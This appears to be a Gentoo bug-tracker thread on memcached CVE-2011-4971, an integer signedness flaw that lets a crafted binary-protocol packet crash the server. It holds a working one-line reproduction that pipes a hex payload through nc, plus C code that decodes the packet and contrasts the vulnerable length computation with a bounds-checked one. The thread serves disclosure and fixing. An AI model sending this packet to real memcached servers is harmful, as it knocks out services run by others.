From ${URL} :

This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:
$ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it:
$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has changed significantly since then.

External references:
https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872

@maintainer(s): after the bump, in case we need to stabilize the package, please say explicitly if it is ready for the stabilization or not
There is a suggested (but untested and unmerged) patch at [1], a comment from the issue Ago linked. [1] https://code.google.com/p/memcached/issues/detail?id=192#c19
CVE-2011-4971 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4971): Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
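The following is an added example, not code from the bug report or from memcached itself. It parses the 24-byte binary-protocol header of the crafted packet from the reproduction steps above and shows the class of error the CVE text describes: the value length is derived from the unsigned 32-bit body length but held in a signed int, so the body length 0xffffffe8 wraps to a negative count. The "checked" variant is an illustrative hardening, not the upstream patch; the packet bytes are transcribed from the comment above (header, extras and key byte only, since the header is what matters here), and all function and type names are the example's own.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The 24-byte memcached binary-protocol request header; all multi-byte
 * fields are big-endian on the wire. */
typedef struct {
    uint8_t  magic;
    uint8_t  opcode;
    uint16_t keylen;
    uint8_t  extlen;
    uint8_t  datatype;
    uint16_t vbucket;
    uint32_t bodylen;
    uint32_t opaque;
    uint64_t cas;
} bin_req_header;

/* Leading bytes of the crafted packet from the reproduction above:
 * header (24 bytes), 8 bytes of extras, 1 key byte. Transcribed here
 * for the example; the trailing padding zeros are omitted because the
 * header alone drives the faulty length computation. */
static const uint8_t crafted_packet[] = {
    0x80, 0x12, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xe8, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
    0x00
};
static const size_t crafted_packet_len = sizeof crafted_packet;

static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(((uint16_t)p[0] << 8) | p[1]);
}
static uint32_t rd32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}
static uint64_t rd64(const uint8_t *p) {
    return ((uint64_t)rd32(p) << 32) | rd32(p + 4);
}

/* Parse a request header; returns 0 on success, -1 if the buffer is too
 * short or the magic byte is not the request magic 0x80. */
int parse_bin_header(const uint8_t *buf, size_t len, bin_req_header *h) {
    if (len < 24 || buf[0] != 0x80) return -1;
    h->magic    = buf[0];
    h->opcode   = buf[1];
    h->keylen   = rd16(buf + 2);
    h->extlen   = buf[4];
    h->datatype = buf[5];
    h->vbucket  = rd16(buf + 6);
    h->bodylen  = rd32(buf + 8);
    h->opaque   = rd32(buf + 12);
    h->cas      = rd64(buf + 16);
    return 0;
}

/* The signedness error in its simplest form: the value length is the
 * unsigned body length minus key and extras, but it is stored in a signed
 * int, so a huge body length becomes a negative count that later code
 * would pass on as a size. */
int vulnerable_value_length(const bin_req_header *h) {
    int nkey = h->keylen;
    int vlen = (int)(h->bodylen - (uint32_t)(nkey + h->extlen));
    return vlen;
}

/* Hardened form (illustrative check, not the upstream fix): keep the
 * arithmetic unsigned, require that the body can hold key and extras, and
 * bound the value length so that adding the trailing "\r\n" and converting
 * to int cannot overflow. Returns 0 and the length, or -1 to reject. */
int checked_value_length(const bin_req_header *h, uint32_t *vlen_out) {
    uint32_t fixed = (uint32_t)h->keylen + (uint32_t)h->extlen;
    if (h->bodylen < fixed) return -1;
    uint32_t vlen = h->bodylen - fixed;
    if (vlen > (uint32_t)(INT_MAX - 2)) return -1;
    *vlen_out = vlen;
    return 0;
}

int main(void) {
    bin_req_header h;
    uint32_t vlen;
    if (parse_bin_header(crafted_packet, crafted_packet_len, &h) != 0) {
        puts("not a binary request");
        return 1;
    }
    printf("opcode=0x%02x keylen=%u extlen=%u bodylen=0x%08x\n",
           h.opcode, h.keylen, h.extlen, h.bodylen);
    printf("vulnerable vlen = %d\n", vulnerable_value_length(&h));
    printf("checked vlen: %s\n",
           checked_value_length(&h, &vlen) == 0 ? "accepted" : "rejected");
    return 0;
}
```

For the packet above the header decodes to opcode 0x12 with keylen 1, extlen 8 and bodylen 0xffffffe8; the signed computation yields -33, while the checked variant rejects the request before any allocation happens.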
The bug is fixed in 1.4.16 as per upstream. Adding to existing GLSA
Sorry 1.4.17 not 1.4.16
This issue was resolved and addressed in GLSA 201406-13 at http://security.gentoo.org/glsa/glsa-201406-13.xml by GLSA coordinator Chris Reffett (creffett).